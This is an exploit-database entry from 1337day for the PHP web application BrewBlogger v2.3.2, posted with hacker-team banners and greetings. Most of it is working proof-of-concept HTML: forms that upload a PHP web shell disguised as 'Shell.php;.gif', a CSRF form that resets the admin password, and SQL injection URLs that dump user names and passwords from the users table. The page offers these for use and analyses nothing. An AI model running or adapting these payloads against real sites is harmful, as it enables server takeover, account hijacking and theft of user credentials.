Lucene search

K
zdtKedAns-Dz1337DAY-ID-17589
HistoryFeb 29, 2012 - 12:00 a.m.

BrewBlogger v2.3.2 Multiple (XSRF/ShellUpload/SQLi) Vulnerabilities

2012-02-2900:00:00
KedAns-Dz
0day.today
22

Exploit for php platform in category web applications

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : BrewBlogger v2.3.2 Multiple (XSRF/ShellUpload/SQLi) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) [email protected]
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com
# platform : php
# Type : Multiple XSRF
# Security Risk : Critical
# Tested on : Windows XP-SP3 (Fr)
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
##

./<3 <3 Greetings t0 Palestine <3 <3

####==+[ Exploit (1) Shell/File Upload ]+====>

#+> p0c I ==>

<title>Upload Shell.php;.gif</title>
<h3>Upload Shell.php;.gif [::></h3>
<form action="http://[target]/index.php?action=upload" method="post" name="upload" id="upload" enctype="multipart/form-data" >
<input name="userfile" type="file" class="submit" id="userfile" size="80">
<input type="submit" value="Upload !">
</form>

#+> p0c II ==>

<title>Upload Shell.php;.gif *.images</title>
<h3>Upload Shell.php;.gif *.images [::></h3>
<form action="http://[target]/includes/upload_image.inc.php?KeepThis=true&TB_iframe=true" method="post" name="upload" id="upload" enctype="multipart/form-data" >
<input name="userfile" type="file" class="submit" id="userfile" size="80">
<input type="submit" value="Upload !">
</form>

#+> p0c III ==>

<title>Upload Shell.php;.xml ;.txt</title>
<h3>Upload Shell.php;.xml ;.txt [::></h3>
<form action="http://[target]/index.php?action=importXML&section=default&messageInserted=&inserted=true" method="post" name="upload" id="upload" enctype="multipart/form-data" >
<input name="userfile" type="file" class="submit" id="userfile" size="80">
<input type="submit" value="Upload !">
</form>

####==+[ Exploit (2) CSRF Change Admin Password ]+====>

<title>Change Admin Password</title>
<h3>Change Admin Password [::></h3>
<form action="http://[target]/index.php?action=edit&dbTable=users&section=password&filter=admin&id=1" method="post">
<input type="hidden" name="userLevel" value="1">
<input type="hidden" name="user_name" value="admin" >
<input type="password" name="password" value="" size="20">
<input type="submit" value="Change Admin Passwd !">
</form>

####==+[ Exploit (3) SQL Injection ]+====>

// 0dl bY 'Brendan Coles'
// http://1337day.com/exploits/16383

#+> p0c I ==>

<title>SQL Injection 1</title>
<h3>SQL Injection 1 [::></h3>
<form action="http://[target]/sections/reference.inc.php?source=log&section=styles&filterStyle=NULL UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(user_name,0x3a,password),NULL,concat(realFirstName,0x20,realLastName) FROM users--" method="post">
<input type="submit" value="Inj3ct it !">
</form>

#+> p0c II ==>

<title>SQL Injection 2</title>
<h3>SQL Injection 2 [::></h3>
<form action="http://[target]/sections/reference.inc.php?source=log&section=styles&styleNumber=NULL UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(user_name,0x3a,password),NULL,concat(realFirstName,0x20,realLastName) FROM users--" method="post">
<input type="submit" value="Inj3ct it !">
</form>

# The EnD ./ Greetings t0 palestine ./ ^__^ Like aNd Inj0Y

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=======================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Rizky Ariestiyansyah * Islam Caddy * HMD-Cr3w
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * 
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * r00tw0rm.com * Dis9UE
# www.packetstormsecurity.org * www.metasploit.com * I-BackTrack * All Security and Exploits Webs ..
#===================================================================================================



#  0day.today [2018-01-05]  #